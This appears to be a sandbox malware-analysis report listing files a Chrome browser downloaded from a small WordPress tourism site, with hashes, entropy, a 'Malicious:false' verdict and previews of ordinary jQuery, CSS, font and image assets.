              Preview:.fab:before{..font-family:'Font Awesome 5 Brands';..}..admin-bar .main-header .header-upper{..top:32px !important;..}..elementor-element .elementor-column-gap-default > .elementor-row > .elementor-column > .elementor-element-populated{..padding:0px 0px 0px 0px;..}..single-whatwe-do-box .icon .icon{..padding:0px;..}...pagination{..position:relative;..display:block;..}..pagination li{..position: relative;. display: inline-block;. margin-right: 15px;. margin-bottom: 10px;.}..pagination li a, .pagination li span{..position: relative;. display: block;. line-height: 30px;. font-size: 18px;. height: 60px;. min-width: 60px;. padding: 15px 5px;. text-align: center;. color: #181b1f;. font-weight: 400;. background: #ffffff;. box-shadow: 0px 15px 15px 0px rgba(0,0,0,0.15);. text-transform: capitalize;. -webkit-transition: all 500ms ease;. -moz-transition: all 500ms ease;. -ms-transition: all 500ms ease;. -o-transition: all 500ms ease;. tr
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, ASCII text, with very long lines (25321)
              Category:downloaded
              Size (bytes):25504
              Entropy (8bit):5.002162480108727
              Encrypted:false
              SSDEEP:
              MD5:61C0DC9F1AB176ADC9B6B25FA9DB9E4E
              SHA1:F5CE93DA4F35F7B357C88EA8EB52721B30D834E9
              SHA-256:8FF5DE1B0B1D4922B0BF1EEA21886EFA9976D29655DD30C5EA435DC0B583AEEE
              SHA-512:B4C182AF1FA38672039B9F4532B3B888A8E0C21799C3BB3210C9264BFA513DDE2E646F6FCB4DD374DB22EA4EDFC0A20AEE66A7D04C56C7AB06F88E189B532939
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-includes/js/jquery/ui/sortable.min.js?ver=1.13.3
              Preview:/*!. * jQuery UI Sortable 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery","./mouse","../data","../ie","../scroll-parent","../version","../widget"],t):t(jQuery)}(function(u){"use strict";return u.widget("ui.sortable",u.ui.mouse,{version:"1.13.3",widgetEventPrefix:"sort",ready:!1,options:{appendTo:"parent",axis:!1,connectWith:!1,containment:!1,cursor:"auto",cursorAt:!1,dropOnEmpty:!0,forcePlaceholderSize:!1,forceHelperSize:!1,grid:!1,handle:!1,helper:"original",items:"> *",opacity:!1,placeholder:!1,revert:!1,scroll:!0,scrollSensitivity:20,scrollSpeed:20,scope:"default",tolerance:"intersect",zIndex:1e3,activate:null,beforeStop:null,change:null,deactivate:null,out:null,over:null,receive:null,remove:null,sort:null,start:null,stop:null,update:null},_isOverAxis:function(t,e,i){return e<=t&&t<e+i},_isFloati
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:dropped
              Size (bytes):5172
              Entropy (8bit):7.955673497922836
              Encrypted:false
              SSDEEP:
              MD5:F01F86AA1F16C5F6A1819229D7C66FF2
              SHA1:B0645531F8094A6228AC6A7A8A0D9D1AA57A9F9F
              SHA-256:E6352298742F19C655B93DBC262D864EA6895F745F772B4F536EEAEA8B4AD185
              SHA-512:C832FB0CA2DDA6515308BD5ED6A4900C0113093308F3955AE217B110EC61ECD22DCEEEFEA0CE1FD69126240DC64F50BA35F292A3D9D6DA4F99AAE5F31B46606D
              Malicious:false
              Reputation:unknown
              Preview:RIFF,...WEBPVP8L..../..?.g.:.d%....".....].`..V...`R~*b...qg.I....wn..9pu..5.....h....{..i0xg'..G...W.'9gv.h.A3k`...).)BR.&f...\n.VKb..^AX....?.9@0..y...nY-^Z43jf...Y3.Z.mG.$.....h3+.p......!..u_D.!H.....&..bt....o+...Q......U.........Bosa.._ .t.vI...h....@.]K.4..H../.....}...v*;.....Jx.....<.}................/..........y*A.z.R.i.ks*E..D.......Cn..z..\.uH..:D4...,._....!..9.@/)X.w.f.DH.!.C.*......I..u..Bp.........].S.p|7.y..w.p.x.w....=...|>.a..?d..'n....W.5.....@.t v......u:.....~H.....Z........p.E.....3......=.Q..H..(.B.........%.wD...$K[...-Ap.8...E.f..GI..bO>z.M/Y+..S.P..A<%.Q......RF...8..Q...EI.xR....I........q.$...eT{.R.*.`D*4~7.1.q.Z..q"..........DY.p...xfPG.wT"K..:..L..0.:.}..!..R...Eo..\..|..].u.N..wx.g].s..Q.)&...x..E....o.N.....|..3n c.|...V.............p".s..$9..6.s..1nD..vpU....6...I..;t#.#}.z...u.p..C.b<...&...uJ.?B........\...g.q...Wi...O?..H.kT"...Gd6......B-?Y'o..?>..Q.)..ZTs.UA.3H<.7.t...;.i|b.....D..z...9..
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (1541), with no line terminators
              Category:downloaded
              Size (bytes):1541
              Entropy (8bit):4.970078267160352
              Encrypted:false
              SSDEEP:
              MD5:B0385854D52DB2C6AAC1007451A5A07F
              SHA1:4F15F9B6F8C6C95165A9040190F8FCB0A3F3979A
              SHA-256:7F74CB5CEC038C790557E2AD879CF10E39FCD615571A664361804F973DD81B1B
              SHA-512:BB0E7175B11919349A8A69CC829BDF9EBB119F424DE1769A64D2FB3955B7729DB710AC1819439F6B5F57CC61FC99A0D6564CFAF3758EC944DF8C313A6C48EAD8
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/uploads/elementor/css/post-1.css?ver=1726496923
              Preview:.elementor-kit-1{--e-global-color-primary:#6EC1E4;--e-global-color-secondary:#54595F;--e-global-color-text:#7A7A7A;--e-global-color-accent:#61CE70;--e-global-color-6346d046:#F3F3F3;--e-global-color-4737e142:#252627;--e-global-color-200b7435:#9D9684;--e-global-color-1ab803ef:#4054B2;--e-global-color-4a71d753:#23A455;--e-global-color-106ad6b8:#74986A;--e-global-color-182cc861:#FFF;--e-global-typography-primary-font-family:"Sarala";--e-global-typography-primary-font-weight:600;--e-global-typography-secondary-font-family:"Sarala";--e-global-typography-secondary-font-weight:400;--e-global-typography-text-font-family:"Sarala";--e-global-typography-text-font-weight:400;--e-global-typography-accent-font-family:"Sarala";--e-global-typography-accent-font-weight:500;}.elementor-kit-1 p{margin-bottom:0px;}.elementor-kit-1 h1{font-family:"Sarala", Sans-serif;}.elementor-kit-1 h2{font-family:"Sarala", Sans-serif;}.elementor-kit-1 h3{font-family:"Sarala", Sans-serif;}.elementor-kit-1 h4{font-family:"
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:SVG Scalable Vector Graphics image
              Category:dropped
              Size (bytes):686
              Entropy (8bit):5.176822373117007
              Encrypted:false
              SSDEEP:
              MD5:FDC33386003442BCB30837102E6211AC
              SHA1:3930C66F904F070304510759B8D14159D94E394D
              SHA-256:951C36E2F2DF1AF17427A767B13A431FEE2F5049557F54189E86F543FA6BCBF4
              SHA-512:437BDEE80508945CA11803EEA1F563E30B9116FE9B97117CC37136D57D2EC815D0519AB6AB7E41F52805D6D386D1CEF452FBD0C6F3025919BEFD409EE3076AA4
              Malicious:false
              Reputation:unknown
              Preview:<svg width="64px" height="64px" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" class="lds-rolling" style="background: none;"><circle cx="50" cy="50" fill="none" ng-attr-stroke="{{config.color}}" ng-attr-stroke-width="{{config.width}}" ng-attr-r="{{config.radius}}" ng-attr-stroke-dasharray="{{config.dasharray}}" stroke="#f43737" stroke-width="3" r="30" stroke-dasharray="141.37166941154067 49.12388980384689" transform="rotate(211.862 50 50)"><animateTransform attributeName="transform" type="rotate" calcMode="linear" values="0 50 50;360 50 50" keyTimes="0;1" dur="1.5s" begin="0s" repeatCount="indefinite"></animateTransform></circle></svg>
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (3248)
              Category:dropped
              Size (bytes):3428
              Entropy (8bit):5.036898941425704
              Encrypted:false
              SSDEEP:
              MD5:DD6A0D8D7B3E0AFBBC0BBB417DCC387B
              SHA1:0B38C782DA1C8ECC6BC7E854F8841FB9D2C86E35
              SHA-256:F36ADC07DB49E73C3FD3AEB4234D270725F07719706DD28DFC09657F2CFFE9D6
              SHA-512:E0963A8C2DE54CA9A29D2F3FB0ADF54946172E11589F0DA3DAFBF603B9F38C7A4A8A977465B0A9C32DA9D4127D916E60C390DEA1E17D55B3EDEE0B760401135C
              Malicious:false
              Reputation:unknown
              Preview:/*!. * jQuery UI Mouse 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../ie","../version","../widget"],e):e(jQuery)}(function(o){"use strict";var n=!1;return o(document).on("mouseup",function(){n=!1}),o.widget("ui.mouse",{version:"1.13.3",options:{cancel:"input, textarea, button, select, option",distance:1,delay:0},_mouseInit:function(){var t=this;this.element.on("mousedown."+this.widgetName,function(e){return t._mouseDown(e)}).on("click."+this.widgetName,function(e){if(!0===o.data(e.target,t.widgetName+".preventClickEvent"))return o.removeData(e.target,t.widgetName+".preventClickEvent"),e.stopImmediatePropagation(),!1}),this.started=!1},_mouseDestroy:function(){this.element.off("."+this.widgetName),this._mouseMoveDelegate&&this.document.off("mousemove."+this.widgetName,this._mouseMoveDelegate).of
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (1002), with CRLF line terminators
              Category:downloaded
              Size (bytes):539425
              Entropy (8bit):5.111315307523134
              Encrypted:false
              SSDEEP:
              MD5:8EC0DB1CB8ED2395C5DF4E11BE0D86E9
              SHA1:D91E3C65E262D7E0021A926D228B9F6AD9AEF4A9
              SHA-256:97BCA2A8204372F21C29BC2D6CEEB192EAB0719F1D154E1073F04ACD8D2F0064
              SHA-512:0BBE5FD8A7991D8F0BB43A0DFF3BC1130F5E2514524FCCA9DC4662815155644D44A550BA2FFD92E86177C024D28319DC28A39D007C01BFDE6BDBFE3D429C8F71
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/js/jquery-ui.js?ver=1726496070
              Preview:/*! jQuery UI - v1.12.1 - 2016-09-14..* http://jqueryui.com..* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sorta
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:PNG image data, 1500 x 440, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):29111
              Entropy (8bit):7.842474460955613
              Encrypted:false
              SSDEEP:
              MD5:79308D3A267E389112DC91B1713FC25B
              SHA1:2334D7EC8E41B3E42E8FC70B3FD368AB2DC93B56
              SHA-256:BC75FA5D9E5898DA0266B5C0F6275949E843BDD7C00A749EAFB9A1C82080C51F
              SHA-512:34298B9585CADC9962A7A6A531D56EE532A1B84572D47890107DAC15E7E54AFC15E28BE25C0BFD7B5C54A73C88D6A972C23A93D39E481D74F19CD01773FAFFA8
              Malicious:false
              Reputation:unknown
              Preview:.PNG........IHDR............._.%;....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:9F4B06677E39EC11A659DA0A21973A52" xmpMM:DocumentID="xmp.did:5EC1577F3D8911ECAEF9D2A9BAC02804" xmpMM:InstanceID="xmp.iid:5EC1577E3D8911ECAEF9D2A9BAC02804" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2EE22036E3DEC11A09FEE3D0EE149A9" stRef:documentID="xmp.did:9F4B06677E39EC11A659DA0A21973A52"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>,n.r..m.IDATx...y.e...U..|=.....D...|_D.AB.....rY..
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JSON data
              Category:downloaded
              Size (bytes):3
              Entropy (8bit):1.584962500721156
              Encrypted:false
              SSDEEP:
              MD5:8A80554C91D9FCA8ACB82F023DE02F11
              SHA1:5F36B2EA290645EE34D943220A14B54EE5EA5BE5
              SHA-256:CA3D163BAB055381827226140568F3BEF7EAAC187CEBD76878E0B63E9E442356
              SHA-512:CA4B6DEFB8ADCC010050BC8B1BB8F8092C4928B8A0FBA32146ABCFB256E4D91672F88CA2CDF6210E754E5B8AC5E23FB023806CCD749AC8B701F79A691F03C87A
              Malicious:false
              Reputation:unknown
              URL:https://maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
              Preview:{}.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (26545)
              Category:downloaded
              Size (bytes):74386
              Entropy (8bit):5.030247873263324
              Encrypted:false
              SSDEEP:
              MD5:884A8B9CD6383BBD0D0071C5BAB470B5
              SHA1:69821DE0EC5E07D0F30AF9DF9DFE2E78E248E2B7
              SHA-256:25A0DFDF56D0FF9ED2BFB04999EBC5BE5CFA8D2E143D3364DC9CF9CBA65C1703
              SHA-512:23FE184ABA3BFCFE774A640545ED651A2A37D0AA37FE4CDADA6D497A890FB69DCB420882367AC9983272263A8FF4623998F0295122F9E4D97D831902880329C0
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/assets/css/libraries.css?ver=6.6.2
              Preview:/*!. * Font Awesome 4.4.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */.@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.4.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.4.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.4.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.4.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.4.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.4.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
              Category:downloaded
              Size (bytes):18536
              Entropy (8bit):7.986571198050597
              Encrypted:false
              SSDEEP:
              MD5:8EFF0B8045FD1959E117F85654AE7770
              SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
              SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
              SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
              Malicious:false
              Reputation:unknown
              URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
              Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Unicode text, UTF-8 text, with very long lines (8189)
              Category:dropped
              Size (bytes):21464
              Entropy (8bit):5.303481082929494
              Encrypted:false
              SSDEEP:
              MD5:8FBC22C79D40119DDE9A5D16897002B9
              SHA1:E9837519ACA724457792E2D5EE98A97A0367CDF9
              SHA-256:7E84C9F8D71BC6EB2DAC2FCE59A6CAEA62DA51FFA8CF56B41806F59386AB1322
              SHA-512:3118A198A3710C839C15D6C4B5DC9F9ADCD637913AF2E26F438B01C80B27281F4937E25AAD2817855D8B3EB36207C61AE16D62B17E698799C5316E86F52AC6FC
              Malicious:false
              Reputation:unknown
              Preview:/*! jQuery UI - v1.13.3 - 2024-04-26.* https://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-patch.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sort
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (10075)
              Category:downloaded
              Size (bytes):273639
              Entropy (8bit):5.407791771882002
              Encrypted:false
              SSDEEP:
              MD5:429E2C94AD6F3495539A7ABF95C6E608
              SHA1:2F6A84081093967BAA50E00D4DF7F8CC45CDD19D
              SHA-256:0B73D8C2668C726BB234CA3E92CE1FD27A00FCE21B84B68004FE67F8148A3507
              SHA-512:E190B37E45F489C28D0E3808F2227F9349069E0413F87AFB607AEAB7332197011D3D2B3D9FC9B7AE74C38863704BAC55A0F86349232C06AC518673F703C52B37
              Malicious:false
              Reputation:unknown
              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/10/common.js
              Preview:google.maps.__gjsload__('common', function(_){var Iia,Hia,Kia,Qia,Tia,$ia,aja,dja,Ir,eja,Jr,fja,Kr,gja,Lr,Or,Qr,ija,kja,jja,mja,nja,pja,ys,rja,tja,uja,Js,yja,pt,Hja,Jja,Ija,Nja,Oja,Rja,Sja,Tja,Ut,$t,Yja,au,du,Zja,eu,$ja,hu,fka,tu,jka,uu,kka,lka,nka,pka,oka,rka,qka,mka,ska,tka,zu,uka,ala,ela,gla,ila,wla,Vla,Yla,bma,cma,kma,lma,mma,nma,rma,pma,qx,rx,tma,uma,vma,wma,yma,jw,kw,zma,fla,iw,lw,Nia,Oia,jla,Pia,Xia,Zia,Ema,Fma,Gma,Hma,Ima,yx,$v,Lma,Mma,Nma,Pma,Cla,Ula,Nla,vja,Ds;.Iia=function(a){const b=[];let c=a.length;var d=a[c-1];let e;if(_.Vg(d)){c--;e={};var f=0;for(const g in d)d[g]!=null&&(e[g]=Hia(d[g],a,g),f++);f||(e=void 0)}for(d=0;d<c;d++)f=a[d],f!=null&&(b[d]=Hia(f,a,d+1));e&&b.push(e);return b};Hia=function(a,b,c){a instanceof _.mh&&(a=a.Eg(b,+c));return Array.isArray(a)?Iia(a):typeof a==="boolean"?a?1:0:typeof a==="number"?isNaN(a)||a===Infinity||a===-Infinity?String(a):a:a instanceof Uint8Array?_.cc(a):a instanceof _.jc?_.qc(a):a};_.Sq=function(a){return!!a.handled};._.Jia=funct
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (854)
              Category:downloaded
              Size (bytes):229468
              Entropy (8bit):5.566647216906841
              Encrypted:false
              SSDEEP:
              MD5:20351DFC653E692C64E879AE4B3962F6
              SHA1:19AF70758C4C13C1E1AF3B8E1C3C2612D7B2D764
              SHA-256:AFC7F2D9B0524D9F2B92A7F18BB1DC774D830CD61F762051FD6B55CA084A8049
              SHA-512:FC6C30B4EA625FD304B68F689F5C79A3F3D7F2A390E0229AFE224E7DD3EEC2D1918C8F1617270AC21D69CC67C281D3E43104AEF76A82E1CD561BD4DB24346516
              Malicious:false
              Reputation:unknown
              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/10/main.js
              Preview:(function(_){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2019 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*.. Copyright 2017 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*..Math.uuid.js (v1.4).http://www.broofa.com.mailto:robert@broofa.com.Copyright (c) 2010 Robert Kieffer.Dual licensed under the MIT and GPL licenses..*/.var aaa,la,oa,ma,ra,caa,daa,La,ob,ub,eaa,rc,sc,faa,Ec,Fc,Hc,Jc,ld,kaa,Kd,Ad,Bd,Ed,$d,maa,naa,Yd,Xd,laa,ie,ee,oaa,ge,paa,pe,qaa,ue,te,ve,raa,Be,Ee,Pe,Re,Se,saa,qf,vaa,yaa,rf,xaa,waa,uaa,taa,sf,zaa,Hf,Daa,Of,Eaa,Iaa,Kaa,Laa,Maa,Paa,eg,fg,gg,hg,Raa,Saa,Waa,Taa,Vaa,kg,sg,Xaa,ug,vg,Zaa,Yaa,$aa,zg,aba,cba,dba,eba,hba,Dg,Fg,Gg,fba,gba,kba,Hg,Lg,Og,lba,Qg,Pg,mba,oba,qba,uba,wba,vba,yba,xba,Dba,Eba,Gba,Kba,Lba,gj,Nba,Oba,Pba,Sba,Rba,Tba,pj,Qba,Uba,Mj,Sj,jk,aca,lk,cca,tk,fca,ica,Dk,Rk,Tk,Qk,Uk,ml,vl,qca,yl,.Bl,Cl,El,Hl,vca,Kl,xca,Aca,Cca,Bca
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
              Category:downloaded
              Size (bytes):2966
              Entropy (8bit):7.667899969302472
              Encrypted:false
              SSDEEP:
              MD5:3AB835CCBCA393BC97962344E355E365
              SHA1:06C30D30188AA2542E2673BD2DD25E153D2E340A
              SHA-256:1DC803B8BBD2BE87089B14CC96BED290D23CB7B00A149CC088830A90DBAEB930
              SHA-512:EDC42DB5C3B82931C281B9CE7963C3BCF722EB858CAC9038161B1FFFEC1C232AF19274A873063A0513807F855B5AD99206EE4BDC7151A70136C8C325503E1030
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/uploads/2021/12/favicon2.png
              Preview:.PNG........IHDR...@...@.............tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:47075C72528F11EC86EA993513081D90" xmpMM:DocumentID="xmp.did:47075C73528F11EC86EA993513081D90"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:47075C70528F11EC86EA993513081D90" stRef:documentID="xmp.did:47075C71528F11EC86EA993513081D90"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...u....PLTE............><<...eeeyww...QOO!..ECC=;;" ...)&&................................................C@@....~~...
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, ASCII text, with CRLF line terminators
              Category:downloaded
              Size (bytes):221
              Entropy (8bit):4.77689427382724
              Encrypted:false
              SSDEEP:
              MD5:DBD7A4E484B7472B293212EBDD5B2F34
              SHA1:5DF29450B22CCB06D7CA4FA7D467314970F08F07
              SHA-256:8D6481B0A4BF13A411EF32A4A5679E2EC66F243A652C08EE9C5AC14AE7FE9B8D
              SHA-512:F916CBA0C5C119062B1636B52F33F920ECC5C750BC04DB561AA688B679D92807903851D7778F5423F8A991BF5721B0C0D41B645182A44746D1D4F699C4081832
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera-child/style.css?ver=1726496070
              Preview:/**..* Theme Name: Hotera Child..* Description: This is a child theme of Hotera, generated by Merlin WP...* Author: <a href="http://themeforest.net/user/theme-kalia">Theme Kalia</a>..* Template: hotera..* Version: 1.1..*/
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 627x627, components 3
              Category:downloaded
              Size (bytes):244342
              Entropy (8bit):7.978746413590715
              Encrypted:false
              SSDEEP:
              MD5:FBD8BAB0EE103623F7FE19678E278EB9
              SHA1:E4AF8AEFF1D3488ADB2FBD4C11D4AF472EB7CE12
              SHA-256:FC44FEAFA7785DC118E8DE0272AB2B650A3D910E0D7C2B560FF012E751683E7F
              SHA-512:0EA5CC0B45ACD6CEC0099E1625C3896D9B34AA3D350A64DDE49297F44FD614465D754DA1DCFF532DC2E5C47B61ADD2DD641D4F8FF24B5C04D940F1F3823D21A0
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/uploads/2023/09/The-red-STUDIO.jpg
              Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:7F85C27F4BE411EEB869EE164412632C" xmpMM:InstanceID="xmp.iid:7F85C27E4BE411EEB869EE164412632C" xmp:CreatorTool="Adobe Photoshop CS6 Windows"> <xmpMM:DerivedFrom stRef:instanceID="B5410EA20ECF7C2B26B1CC0043BD3AEE" stRef:documentID="B5410EA20ECF7C2B26B1CC0043BD3AEE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d................o..=....'...t......................................................................................................................
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (59119)
              Category:downloaded
              Size (bytes):59305
              Entropy (8bit):4.716988765402807
              Encrypted:false
              SSDEEP:
              MD5:ECD507B3125EDC4D2A03AA6AE5D07DA9
              SHA1:A57EE68D11601B0FD8E5037FC241FF65A754473C
              SHA-256:99464CEB71BC9BBDCC72275FAEFE44F98EB5CBB6B5D8EE665B87B35376F1A96E
              SHA-512:D72727E8871A410E34FCC2815B65B84618ACFC36C82D4EF80B5BD2ACB2710AAE7BA3DE35626D354B036C38CAAF10116572051AEB12E23D8FCD4B947E13ACED25
              Malicious:false
              Reputation:unknown
              URL:https://use.fontawesome.com/releases/v5.15.4/css/all.css?ver=2.0.3
